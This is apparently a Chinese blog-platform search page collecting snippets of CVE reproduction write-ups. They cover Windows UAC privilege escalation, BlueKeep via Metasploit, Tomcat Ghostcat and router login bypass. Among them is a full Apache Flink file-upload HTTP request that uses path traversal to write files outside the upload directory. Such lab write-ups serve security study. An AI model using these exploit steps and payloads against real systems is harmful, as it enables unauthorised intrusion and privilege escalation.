精华内容
下载资源
问答
  • 初学者如何学会分析各种漏洞,求推荐初学者应该看的资料
  • 这是公开的CVE漏洞,我只进行复现展示,有兴趣的可以自己去查找相关细节。 1. 待进入的后台管理界面(密码未知): 2. 利用cve编写的exp代码: 3. 运行代码会产生一个token值(利用这个值就可以进入后台): 4. 利用...

    实现功能:未知密码的场景下,实现web后台管理界面的登录。

    • 路由器型号进行打码处理,只展示实现过程(但还是能一眼看出来,不做多说明)。
    • 具体代码细节不进行展示。
    • 这是公开的CVE漏洞,我只进行复现展示,有兴趣的可以自己去查找相关细节。

    1. 待进入的后台管理界面(密码未知):

    在这里插入图片描述

    2. 利用cve编写的exp代码:

    在这里插入图片描述

    3. 运行代码会产生一个token值(利用这个值就可以进入后台):

    在这里插入图片描述

    4. 利用token值进入后台:

    在这里插入图片描述

    展开全文
  • 有对CVE漏洞感兴趣的小伙伴看过来

    召唤对Linux Kernel和GNU开源项目CVE漏洞研究感兴趣的小伙伴,主要的工作是共同研究CVE漏洞的复现步骤、触发原理、补丁合理性探究等工作....


    我们可以成立一个虚拟团队,大家的方向主要集中在Linux Kernel和GNU开源项目CVE漏洞研究,合作方式不限


    有类似想法的小伙伴可以给我发邮件进行沟通或者CSDN上留言

    byhankswang@163.com

    展开全文
  • CVE-2018-8174漏洞复现

    2019-01-09 17:32:37
    CVE-2018-8174漏洞复现
  • 漏洞简介 该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中 默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示 Secure Desktop 这些提示是由名为 consent.exe 的可执行文件产生的,该...

    前言:

    漏洞简介

    该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中
    默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示 Secure Desktop
    这些提示是由名为 consent.exe 的可执行文件产生的,该可执行文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为System
    因为用户可以与该UI交互,因此对UI来说紧限制是必须的,否则,低权限的用户可能可以通过UI操作的循环路由以SYSTEM权限执行操作,即使隔离状态的看似无害的UI特征都可能会成为引发任意控制的动作链的第一步。
    事实上,UAC会话中含有尽可能少的点击操作选项,利用该漏洞很容易就可以提升权限到SYSTEM。
    影响范围:

    SERVER:

    Windows 2008r2 7601 ** link OPENED AS SYSTEM **
    Windows 2012r2 9600 ** link OPENED AS SYSTEM **
    Windows 2016 14393 ** link OPENED AS SYSTEM **
    Windows 2019 17763 link NOT opened

    WORKSTATION:

    Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
    Windows 8 9200 ** link OPENED AS SYSTEM **
    Windows 8.1 9600 ** link OPENED AS SYSTEM **
    Windows 10 1511 10240 ** link OPENED AS SYSTEM **
    Windows 10 1607 14393 ** link OPENED AS SYSTEM **
    Windows 10 1703 15063 link NOT opened
    Windows 10 1709 16299 link NOT opened

    环境准备:

    win7系统
    账号:ceshi,普通用户权限。

    利用方式:

    首先,用ceshi用户进行登录windows操作系统,打开cmd,执行whoami命令
    在这里插入图片描述
    然后执行添加用户命令:net user asdf admin#123456.. /add,提示拒绝访问,说明当前ceshi用户的权限是不够的。
    在这里插入图片描述
    接下来利用EXP来进行权限的提升,打开exp文件HHUPD.exe该exp文件大家可以去github上下载,这里就不贴出下载链接了。
    第一步:

    在这里插入图片描述
    第二步:

    在这里插入图片描述第三步:点击确定,点击否按钮。

    在这里插入图片描述
    第四步:此时回到桌面,IE浏览器已经默认打开我们之前点击的URL链接,等待页面加载好后。

    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述第五步:此时选择路径为cmd.exe后,直接回车,弹出的cmd命令行就是system权限的命令行。
    执行whoami命令:
    在这里插入图片描述

    展开全文
  • Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和...

    一、漏洞描述

    ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。
    ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。

    二、漏洞影响

    1.5.1 < ApacheFlink < 1.11.2

    三、漏洞复现

    1、环境搭建

    执行以下命令启动 Apache Flink JobManager 1.11.2:

    cd vulhub/flink/CVE-2020-17518
    docker-compose up -d
    

    Apache Flink 启动后,访问 http://x.x.x.x:8081 查看主页:
    在这里插入图片描述

    2、漏洞复现

    JAR包存放目录是/tmp/flink-web-UUID/flink-web-upload,使用多次../回到根目录,上传success文件:
    在这里插入图片描述
    查看/tmp/目录,可发现success文件:
    在这里插入图片描述

    四、漏洞POC

    POST /jars/upload HTTP/1.1
    Host: localhost:8081
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
    Content-Length: 187
    
    ------WebKitFormBoundaryoZ8meKnrrso89R6Y
    Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
    
    success
    ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
    

    五、参考链接

    https://www.openwall.com/lists/oss-security/2021/01/05/1

    展开全文
  • uWSGI PHP目录穿越 CVE-2018-7490 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 二、漏洞影响 三、漏洞复现 1、环境搭建 2、漏洞复现 四、漏洞POC 五...
  • CVE-2012-1823漏洞复现

    2021-03-31 18:49:18
    CVE-2012-1823漏洞复现CVE-2012-1823漏洞介绍漏洞复现验证漏洞漏洞利用漏洞存在原因漏洞利用方式移除漏洞环境 CVE-2012-1823漏洞介绍 PHP-CGI远程代码执行漏洞 影响版本 php < 5.3.12 or php < 5.4.2 漏洞...
  • CVE-2017-7504漏洞复现

    2021-04-09 09:01:21
    CVE-2017-7504漏洞复现CVE-2017-7504漏洞介绍漏洞复现搭建漏洞环境漏洞复现清除漏洞环境 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 CVE-2017-7504漏洞介绍 Red Hat JBoss Application...
  • CVE-2017-15715漏洞复现

    2021-04-05 13:13:39
    CVE-2017-15715漏洞复现CVE-2017-15715漏洞介绍漏洞复现 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 CVE-2017-15715漏洞介绍 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行...
  • [漏洞复现]CVE-2020-1938漏洞复现

    千次阅读 2020-03-30 17:47:38
    漏洞介绍:Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。 影响版本: Apache Tomcat 6 Apache ...
  • jboss漏洞复现cve-2017-12149漏洞,从环境搭建到复现,自己写的。
  • CVE-2019-0708漏洞复现

    千次阅读 2019-09-26 22:05:04
    CVE-2019-0708漏洞复现CVE-2019-0708背景影响系统测试环境更新kali linux更新msf下载cve_2019_0708模块查看msf安装的路径拷贝模块漏洞复现远程登陆更改用户密码,并进行远程登陆。登陆 CVE-2019-0708背景 Windows...
  • CVE 2019-0708 漏洞复现

    2019-09-23 19:28:01
    **CVE-2019-0708漏洞复现** 目标机:192.168.91.147 攻击机:192.168.91.146 危害涉及: Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP 准备工作: 目标机为win7,开启远程桌面,...
  • Apache Shiro 认证绕过漏洞 CVE-2020-1957 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Apache Shiro 是一款开源安全框架,提供身份验证、授权、密码...
  • CVE-2021-27928漏洞复现

    2021-05-20 13:37:07
    CVE-2021-27928漏洞复现 漏洞简介:它是一个MariaDB的远程命令执行漏洞,存在于10.2.37之前的10.2版本,10.3.28之前的10.3版本,10.4.18之前的10.4版本以及10.5.9之前的10.5版本。 复现环境 攻击机:Ubuntu 20.04...
  • 漏洞复现CVE-2020-0796

    2020-12-12 17:39:39
    CVE-2020-0796-简介漏洞名称漏洞类型漏洞等级漏洞描述漏洞版本漏洞复现准备环境发现漏洞修改expMSf监听开打 这是一篇学习他人文章的笔记,如果你对内容感兴趣可以点击下面的链接访问原作者的文章 参考: 漏洞复现 ...
  • Django JSONField SQL注入漏洞复现CVE-2019-14234) 漏洞概述: Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质...
  • CVE2020-1938漏洞复现

    千次阅读 2020-03-10 22:58:28
    文章目录0x00 漏洞介绍0x01影响版本受影响版本不受影响版本0x02 漏洞环境0x03 漏洞复现0x05 漏洞修护情况一更新高版本情况二 如未使用Tomcat AJP协议情况三 如果使用了Tomcat AJP协议免责声明本文档供学习,请使用者...
  • cve-2017-12615-tomcat漏洞复现文档,从环境搭建到漏洞复现
  • CVE-2017-15715 Apache HTTPD 换行解析漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Apache HTTPD 是一款 HTTP 服务器,它可以通过 mod_php 来运行 PH P...
  • CVE-2021-3156 漏洞复现

    2021-05-13 14:39:22
    CVE-2021-3156 漏洞复现 漏洞描述 这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i...
  • CVE20190708复现

    千次阅读 2019-11-03 16:09:34
    cve_2019_0708_bluekeep_rce (使用漏洞) msf5 exploit ( windows / rdp / cve_2019_0708_bluekeep_rce ) > set rhosts 192.168 .8 . * (设置靶机的ip) rhosts = > 192.168 .8 . * msf5 exploit ( ...
  • CVE-2018-12613漏洞复现

    2021-04-03 10:31:51
    CVE-2018-12613漏洞复现CVE-2018-12613漏洞介绍漏洞复现漏洞利用获得配置信息一句话木马,蚁剑连接反弹shell 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 CVE-2018-12613漏洞介绍 ...
  • CVE-2017-9841漏洞复现

    2021-04-10 10:58:41
    CVE-2017-9841漏洞复现CVE-2017-9841漏洞介绍漏洞复现 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 CVE-2017-9841漏洞介绍 composer是php包管理工具,使用composer安装扩展包将会在当前...
  • CVE-2019-5418漏洞复现

    千次阅读 2020-01-07 14:49:38
    CVE-2019-5418漏洞复现 0x00 漏洞介绍 Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架 构建在Ruby语言上 0x01漏洞原理 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户...
  • CVE-2018-18778漏洞复现

    2021-04-04 13:18:18
    CVE-2018-18778漏洞复现CVE-2018-18778漏洞介绍漏洞复现漏洞修复 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 CVE-2018-18778漏洞介绍 Mini_httpd是一个微型的Http服务器,在占用系统...
  • CVE-2012-2122漏洞复现

    2021-04-02 10:26:35
    CVE-2012-2122漏洞复现CVE-2012-2122漏洞介绍漏洞复现漏洞修复建议 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 CVE-2012-2122漏洞介绍 当连接MariaDB/MySQL时,输入的密码会与期望的...
  • CVE -2019-0708 漏洞复现

    2019-11-06 11:04:24
    CVE -2019-0708 漏洞复现 攻击机 kali 目标机 win7 旗舰版本 攻击IP :192.168.0.210 目标IP: 192.168.0.230 msf需要更新,到最新版。 win7关闭防火墙打开3389 1、打开msf search 0708找到0708 bluekeep_rce模块 ...
  • CVE-2017-7529漏洞复现

    2021-04-06 12:26:27
    CVE-2017-7529漏洞复现CVE-2017-7529漏洞介绍漏洞复现 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 CVE-2017-7529漏洞介绍 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 7,708
精华内容 3,083
关键字:

cve漏洞复现